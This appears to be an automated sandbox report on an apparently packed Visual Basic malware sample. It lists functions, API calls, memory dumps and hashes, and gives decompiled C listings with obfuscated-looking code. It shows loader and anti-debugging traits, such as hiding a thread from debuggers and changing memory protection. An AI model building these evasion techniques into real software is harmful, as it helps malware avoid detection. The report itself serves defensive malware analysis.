                    Function 0040495B, Relevance: 1.4, APIs: 1, Instructions: 129memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 10eb51a673aed10cc03bc7cb3b0365c6713eb13548d9eb803bc178940ec6253e
                    • Instruction ID: ec77c6b93637f733cf500be2849bc4f1e31511a0c7076ed416f7c372fbcefdb4
                    • Opcode Fuzzy Hash: 10eb51a673aed10cc03bc7cb3b0365c6713eb13548d9eb803bc178940ec6253e
                    • Instruction Fuzzy Hash: FC315DD5A6E703C5F49361B000819315450EED735A5B38BBB5723714C2A33E969F368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040494B, Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: ef8bbc329ff087313c6acc93ff6a4307bdfce6dda69b95c87c4a3bd36ebde093
                    • Instruction ID: fa720aa2c45872c0e8ac4a643f182e0874bd86a928e2f07c39cefdea41610ecf
                    • Opcode Fuzzy Hash: ef8bbc329ff087313c6acc93ff6a4307bdfce6dda69b95c87c4a3bd36ebde093
                    • Instruction Fuzzy Hash: 94417CD5A6E703C6F49361B000819315450EED735A2B38BBB5723B14C2A33E969F368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004049AD, Relevance: 1.4, APIs: 1, Instructions: 120memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: cc4189405a68f2ca42e24a75c9aa225f92926348643a07aee0d9fcb29f850240
                    • Instruction ID: 4a36eff456b27500e39820cbb5779d069c7f68533dda1a75d80257eab34a7811
                    • Opcode Fuzzy Hash: cc4189405a68f2ca42e24a75c9aa225f92926348643a07aee0d9fcb29f850240
                    • Instruction Fuzzy Hash: 54315CD5A6E703C6F49361B000819316054EED735A1B38BBB5B33718C2A33E969B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040499E, Relevance: 1.4, APIs: 1, Instructions: 119memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 1973d76d3efa3f8eca72dcfaef39532c7a17038b1df941b23cdab33670e47cd3
                    • Instruction ID: cd53a916cfd969340c337c4d93335e1edca58527055cb3e17a9d5c03dfc6c8f8
                    • Opcode Fuzzy Hash: 1973d76d3efa3f8eca72dcfaef39532c7a17038b1df941b23cdab33670e47cd3
                    • Instruction Fuzzy Hash: C7315CD5A6E703C6F49361B000819316450EED735A1B38BBB5733718C2A33E969B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404B3C, Relevance: 1.4, APIs: 1, Instructions: 116memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 4798b86714e054c56dfc82f0e412d9744def13e72ea29349eb028df01bb77273
                    • Instruction ID: 148ad29ca32e350a587ddf9068280969bb7c76ed40e0a056cc278e6c94aa240b
                    • Opcode Fuzzy Hash: 4798b86714e054c56dfc82f0e412d9744def13e72ea29349eb028df01bb77273
                    • Instruction Fuzzy Hash: 2F2139D0A2E607C5F89321A040809315455FEE73551738BBB9B23718C2A63D969B32DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004049BD, Relevance: 1.4, APIs: 1, Instructions: 112memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: bc143c691bf093c7ebccba199c306ab7be8e89df1fab39c28874c1b79052ebed
                    • Instruction ID: 92b45e25df0ebb70a50ea91e592046a2c7d4a3052279f8bb186e836a2dc8b490
                    • Opcode Fuzzy Hash: bc143c691bf093c7ebccba199c306ab7be8e89df1fab39c28874c1b79052ebed
                    • Instruction Fuzzy Hash: CB317ED4A6E703C5F49361B000819316050EED73592B38BBB5733718C2A33E968B368F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404A6B, Relevance: 1.4, APIs: 1, Instructions: 109memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 91e33f138806f9fd374a4bb8c39bfb5f557424d2b4533238fbf98676654aaf3e
                    • Instruction ID: cb147bb6cc61b047197b813434174cf4c128319adbd0723c65c6827364c0eefe
                    • Opcode Fuzzy Hash: 91e33f138806f9fd374a4bb8c39bfb5f557424d2b4533238fbf98676654aaf3e
                    • Instruction Fuzzy Hash: D0214DD4A6E707C5F49361B000819315054EEE73561738BBB9B33718C2A63E969B32CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404A37, Relevance: 1.4, APIs: 1, Instructions: 109memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 8ac95c6530fe62219c128747c47118d6cfd9bf169f98c4555ed48adecb6f32bc
                    • Instruction ID: c69b1403859733c7cc5d3123be69c0480bce6eeba375f5de3bc5c2b5d97b2e45
                    • Opcode Fuzzy Hash: 8ac95c6530fe62219c128747c47118d6cfd9bf169f98c4555ed48adecb6f32bc
                    • Instruction Fuzzy Hash: 79315CD5A7E707C5F49361B000819316154EEE73561738BBF9B23714C2A23E969B728F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404AEB, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: de3e7cae9c32a2a88d116303178c36f14280665aa5bba7b1ab99c770d22ba0e7
                    • Instruction ID: a6396661349038fbd6d1bb1c1d76b35d292715510b71c8b5717f67cde438a1f9
                    • Opcode Fuzzy Hash: de3e7cae9c32a2a88d116303178c36f14280665aa5bba7b1ab99c770d22ba0e7
                    • Instruction Fuzzy Hash: 18217AD0D2E607C6F95321B000808315455EED73656738BBB9B23728C2A63E969F72CE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404AB2, Relevance: 1.4, APIs: 1, Instructions: 105memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 7aff71f9cdc042bed321d719ce63f0e087760c651781f9c84954bb8c31645a56
                    • Instruction ID: c0937b0cff1bb249555b3b0f0c52f623b9a37c7067222e8afb09757a00bd89fb
                    • Opcode Fuzzy Hash: 7aff71f9cdc042bed321d719ce63f0e087760c651781f9c84954bb8c31645a56
                    • Instruction Fuzzy Hash: 8C214BD4A2E607C5F89361B001819315064EEE73551738FBB9B33718C2A63E969B32CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404AC7, Relevance: 1.4, APIs: 1, Instructions: 103memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 254644590c7491985fb893dc137853faca34093ee44513ee4cfb35dde58dfd4a
                    • Instruction ID: fab38d300d8a960dfe8087095ffeedff7716247deecef09fa22ccfa5180acee5
                    • Opcode Fuzzy Hash: 254644590c7491985fb893dc137853faca34093ee44513ee4cfb35dde58dfd4a
                    • Instruction Fuzzy Hash: AA218CD4A2E607C5F89321B000809316060EED73556738FBB5B23718C2A63EA29B32CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404A56, Relevance: 1.4, APIs: 1, Instructions: 100memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 573d26fde16b3af0309e6634f1e13181e4c12f304e61d72f2c2f9f217da8d2f6
                    • Instruction ID: fd4390dcd7bb85f2687ae67deb092a570c23becf98975b9f227acdf89342d9c4
                    • Opcode Fuzzy Hash: 573d26fde16b3af0309e6634f1e13181e4c12f304e61d72f2c2f9f217da8d2f6
                    • Instruction Fuzzy Hash: FA31ADE0A6E607C5F99361B0418193160A0EEE73152738BBF9723714C2A73E965B768F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00315531, Relevance: .2, Instructions: 195librarynativethreadCOMMON
                    Download Yara Rule
                    APIs
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    • LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                      • Part of subcall function 00315A6C: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00315609,00000040,00310570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00315A87
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                    • String ID:
                    • API String ID: 449006233-0
                    • Opcode ID: 5ae958c3113e0e0aaa7fdbf0c35f4427f06d8ea34d9cb66c872f0b43214b5ccc
                    • Instruction ID: 95965a8509b89ffdc4a01c401158ae78adc07f83252340c1115a1ca75323679c
                    • Opcode Fuzzy Hash: 5ae958c3113e0e0aaa7fdbf0c35f4427f06d8ea34d9cb66c872f0b43214b5ccc
                    • Instruction Fuzzy Hash: B7614961904741CEDB2BCF28C8D47E17A92AF6B330F5682A9CDA64F2D6D365C8C1C712
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00311E09, Relevance: .1, Instructions: 135COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3c15a7b9a87c8160f53269abfe4c8eca20e4b920815d3e0cd1eb82c3f2ebfaae
                    • Instruction ID: 61a3a0aa19a0e419f4cc1bc6b468006305d751e355fe8f99b6ac36853821b287
                    • Opcode Fuzzy Hash: 3c15a7b9a87c8160f53269abfe4c8eca20e4b920815d3e0cd1eb82c3f2ebfaae
                    • Instruction Fuzzy Hash: 254127306443019FEB2AAF64C895BE973A5BF1C350FA14116FE868B1E1D7B5D8C4CA12
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00311C16, Relevance: .1, Instructions: 104COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2059a55964caa1500504178f7ec4321333b4a43cba00d56926b5d3365da83390
                    • Instruction ID: 3ec676f0f83f5df5c1d9449c1b4e4165860825e4063bb571a0fd7c23554af4b9
                    • Opcode Fuzzy Hash: 2059a55964caa1500504178f7ec4321333b4a43cba00d56926b5d3365da83390
                    • Instruction Fuzzy Hash: 1331F771B80611DFCB699A2CDC55BE673E8BF09320F154325FCA9D3692D724E8C68B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00314CBB, Relevance: .0, Instructions: 33COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 17c2ee888b86588c30084440f874a25fc694d3b71ddbbb06637507cf0a777cf1
                    • Instruction ID: 80c7293728723aeb2a857b34c532fde15cafb0e4e5c4cfe2e565464c56f617b2
                    • Opcode Fuzzy Hash: 17c2ee888b86588c30084440f874a25fc694d3b71ddbbb06637507cf0a777cf1
                    • Instruction Fuzzy Hash: 2BF08CB43062029FCB0AEA24D6D4FD473A4EF5D3A0F6684A1EC85C7A63D334EC80C510
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003129C8, Relevance: .0, Instructions: 8COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 50f1797a04462ddc6dea509b6ccbca2ec1beaf0b8fdc9b72d0d0851085ebf76c
                    • Instruction ID: c774c3d1e9a88e27358d1c86903a8312c879459471df9d3be9315755b80da27e
                    • Opcode Fuzzy Hash: 50f1797a04462ddc6dea509b6ccbca2ec1beaf0b8fdc9b72d0d0851085ebf76c
                    • Instruction Fuzzy Hash: 68C092B36405808FEF02CE08C886B8073B1FB25E84B4904D4E803CF612E328ED01CF00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00314802, Relevance: .0, Instructions: 5COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bd978d2a180bd48f33f02ed769998f637591f3217dd52bc83d8caa31607e2653
                    • Instruction ID: 53564383bf43054fcb6bc85e7037885d87c04f7f94de5ee9bb9c5ed8a313171f
                    • Opcode Fuzzy Hash: bd978d2a180bd48f33f02ed769998f637591f3217dd52bc83d8caa31607e2653
                    • Instruction Fuzzy Hash: 08B09234221A408FCA41CE08C180E4073A0BB08660B010680E8208BBA1C324E804CA00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C053, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135COMMON
                    Download Yara Rule
                    C-Code - Quality: 56%
                    			E0040C053(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v32;
				intOrPtr _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				long long _v128;
				signed int _v132;
				signed int* _v136;
				signed int _v140;
				signed int _v144;
				signed char _t61;
				void* _t67;
				void* _t69;
				intOrPtr _t70;
				long long _t73;

				_t70 = _t69 - 0xc;
				 *[fs:0x0] = _t70;
				L00401120();
				_v16 = _t70;
				_v12 = 0x4010f8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401126, _t67);
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				_push( &_v64);
				_t61 =  &_v48;
				_push(_t61);
				_v56 =  *0x4010f0;
				_t73 =  *0x4010e8;
				_v64 = _t73;
				asm("fld1");
				_v72 = _t73;
				L004011C8();
				L004011CE();
				_v128 = _t73;
				asm("fchs");
				asm("fnstsw ax");
				if((_t61 & 0x0000000d) == 0) {
					L004011CE();
					asm("fcomp qword [ebp-0x7c]");
					asm("fnstsw ax");
					asm("sahf");
					if(__eflags == 0) {
						_t17 =  &_v132;
						 *_t17 = _v132 & 0x00000000;
						__eflags =  *_t17;
					} else {
						_v132 = 1;
					}
					_v132 =  ~_v132;
					_v100 = __ax;
					__eax =  &_v64;
					_push( &_v64);
					__eax =  &_v48;
					_push( &_v48);
					_push(2);
					L004011C2();
					__esp = __esp + 0xc;
					__eax = _v100;
					__eflags = __eax;
					if(__eax != 0) {
						__eflags =  *0x40d594;
						if( *0x40d594 != 0) {
							_v136 = 0x40d594;
						} else {
							_push(0x40d594);
							_push(0x4024a8);
							L004011BC();
							_v136 = 0x40d594;
						}
						_v136 =  *_v136;
						_v100 =  *_v136;
						__eax =  &_v32;
						_v100 =  *_v100;
						__eax =  *((intOrPtr*)( *_v100 + 0x1c))(_v100,  &_v32);
						asm("fclex");
						_v104 = __eax;
						__eflags = _v104;
						if(_v104 >= 0) {
							_t37 =  &_v140;
							 *_t37 = _v140 & 0x00000000;
							__eflags =  *_t37;
						} else {
							_push(0x1c);
							_push(0x402498);
							_push(_v100);
							_push(_v104);
							L004011F2();
							_v140 = __eax;
						}
						__eax = _v32;
						_v108 = _v32;
						_v72 = 0x80020004;
						_v80 = 0xa;
						__eax = 0x10;
						L00401120();
						__esi =  &_v80;
						__edi = __esp;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v108 =  *_v108;
						__eax =  *((intOrPtr*)( *_v108 + 0x60))(_v108, L"bdmphgm4oKLHkMpKtKuJ5249");
						asm("fclex");
						_v112 = __eax;
						__eflags = _v112;
						if(_v112 >= 0) {
							_t52 =  &_v144;
							 *_t52 = _v144 & 0x00000000;
							__eflags =  *_t52;
						} else {
							_push(0x60);
							_push(0x4024b8);
							_push(_v108);
							_push(_v112);
							L004011F2();
							_v144 = __eax;
						}
						__ecx =  &_v32;
						L004011B6();
					}
					asm("wait");
					_push(E0040C235);
					return __eax;
				}
				return __imp____vbaFPException();
			}



























                    0x0040c056
                    0x0040c065
                    0x0040c06f
                    0x0040c077
                    0x0040c07a
                    0x0040c081
                    0x0040c090
                    0x0040c093
                    0x0040c09a
                    0x0040c0a1
                    0x0040c0a8
                    0x0040c0b2
                    0x0040c0b3
                    0x0040c0b6
                    0x0040c0bf
                    0x0040c0c2
                    0x0040c0ca
                    0x0040c0cd
                    0x0040c0d1
                    0x0040c0d4
                    0x0040c0d9
                    0x0040c0de
                    0x0040c0e7
                    0x0040c0e9
                    0x0040c0ed
                    0x0040c0f3
                    0x0040c0f8
                    0x0040c0fb
                    0x0040c0fd
                    0x0040c0fe
                    0x0040c109
                    0x0040c109
                    0x0040c109
                    0x0040c100
                    0x0040c100
                    0x0040c100
                    0x0040c110
                    0x0040c112
                    0x0040c116
                    0x0040c119
                    0x0040c11a
                    0x0040c11d
                    0x0040c11e
                    0x0040c120
                    0x0040c125
                    0x0040c128
                    0x0040c12c
                    0x0040c12e
                    0x0040c134
                    0x0040c13b
                    0x0040c158
                    0x0040c13d
                    0x0040c13d
                    0x0040c142
                    0x0040c147
                    0x0040c14c
                    0x0040c14c
                    0x0040c168
                    0x0040c16a
                    0x0040c16d
                    0x0040c174
                    0x0040c179
                    0x0040c17c
                    0x0040c17e
                    0x0040c181
                    0x0040c185
                    0x0040c1a1
                    0x0040c1a1
                    0x0040c1a1
                    0x0040c187
                    0x0040c187
                    0x0040c189
                    0x0040c18e
                    0x0040c191
                    0x0040c194
                    0x0040c199
                    0x0040c199
                    0x0040c1a8
                    0x0040c1ab
                    0x0040c1ae
                    0x0040c1b5
                    0x0040c1be
                    0x0040c1bf
                    0x0040c1c4
                    0x0040c1c7
                    0x0040c1c9
                    0x0040c1ca
                    0x0040c1cb
                    0x0040c1cc
                    0x0040c1d5
                    0x0040c1da
                    0x0040c1dd
                    0x0040c1df
                    0x0040c1e2
                    0x0040c1e6
                    0x0040c202
                    0x0040c202
                    0x0040c202
                    0x0040c1e8
                    0x0040c1e8
                    0x0040c1ea
                    0x0040c1ef
                    0x0040c1f2
                    0x0040c1f5
                    0x0040c1fa
                    0x0040c1fa
                    0x0040c209
                    0x0040c20c
                    0x0040c20c
                    0x0040c211
                    0x0040c212
                    0x00000000
                    0x0040c212
                    0x0040112c

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040C06F
                    • #678.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0D4
                    • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0D9
                    • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0F3
                    • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 0040C120
                    • __vbaNew2.MSVBVM60(004024A8,0040D594,?,?,00401126), ref: 0040C147
                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402498,0000001C), ref: 0040C194
                    • __vbaChkstk.MSVBVM60(00000000,?,00402498,0000001C), ref: 0040C1BF
                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,00000060), ref: 0040C1F5
                    • __vbaFreeObj.MSVBVM60(00000000,?,004024B8,00000060), ref: 0040C20C
                    Strings
                    • bdmphgm4oKLHkMpKtKuJ5249, xrefs: 0040C1CD
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: __vba$CheckChkstkFreeHresult$#678ListNew2
                    • String ID: bdmphgm4oKLHkMpKtKuJ5249
                    • API String ID: 1840260717-316254104
                    • Opcode ID: 0a76fd71c2dd6c036da4bca4f363627f585d09351277c41896fa5862236fa63e
                    • Instruction ID: 0f554fd696726ee348e140752fea5efc4d458bc0cc6133c1b91ab8ab7a6ed652
                    • Opcode Fuzzy Hash: 0a76fd71c2dd6c036da4bca4f363627f585d09351277c41896fa5862236fa63e
                    • Instruction Fuzzy Hash: D8515670D40308EFDB04EF95C889B9DBBB9FB08704F10816AE548BB2A1CBB94844DF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040BD44, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                    Download Yara Rule
                    C-Code - Quality: 63%
                    			E0040BD44(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				void* _v3;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v32;
				void* _v48;
				struct HWND__* _v68;
				signed int _v72;
				signed int _v84;
				intOrPtr _v397355967;
				signed int _t34;
				short _t36;
				void* _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t49;

				_t38 = __ecx;
				asm("in al, dx");
				_t49 = _t48 - 0xc;
				 *[fs:0x0] = _t49;
				L00401120();
				_v16 = _t49;
				_v12 = E004010B0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401126, _t45);
				_t34 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v68);
				asm("fclex");
				_v72 = _t34;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4020d4);
					_push(_a4);
					_push(_v72);
					L004011F2();
					_v84 = _t34;
				}
				HideCaret(_v68);
				L004011EC();
				_push(0);
				_t36 =  *0x004039FF();
				asm("aam 0xa");
				 *_t36 =  *_t36 + _t36;
				_v397355967 = _v397355967 + _t38;
				_v32 = _t36;
				L004011E0();
				_push(E0040BE01);
				return _t36;
			}



















                    0x0040bd44
                    0x0040bd46
                    0x0040bd47
                    0x0040bd56
                    0x0040bd60
                    0x0040bd68
                    0x0040bd6b
                    0x0040bd72
                    0x0040bd81
                    0x0040bd90
                    0x0040bd93
                    0x0040bd95
                    0x0040bd9c
                    0x0040bdb5
                    0x0040bd9e
                    0x0040bd9e
                    0x0040bda0
                    0x0040bda5
                    0x0040bda8
                    0x0040bdab
                    0x0040bdb0
                    0x0040bdb0
                    0x0040bdbc
                    0x0040bdc1
                    0x0040bdcb
                    0x0040bdd3
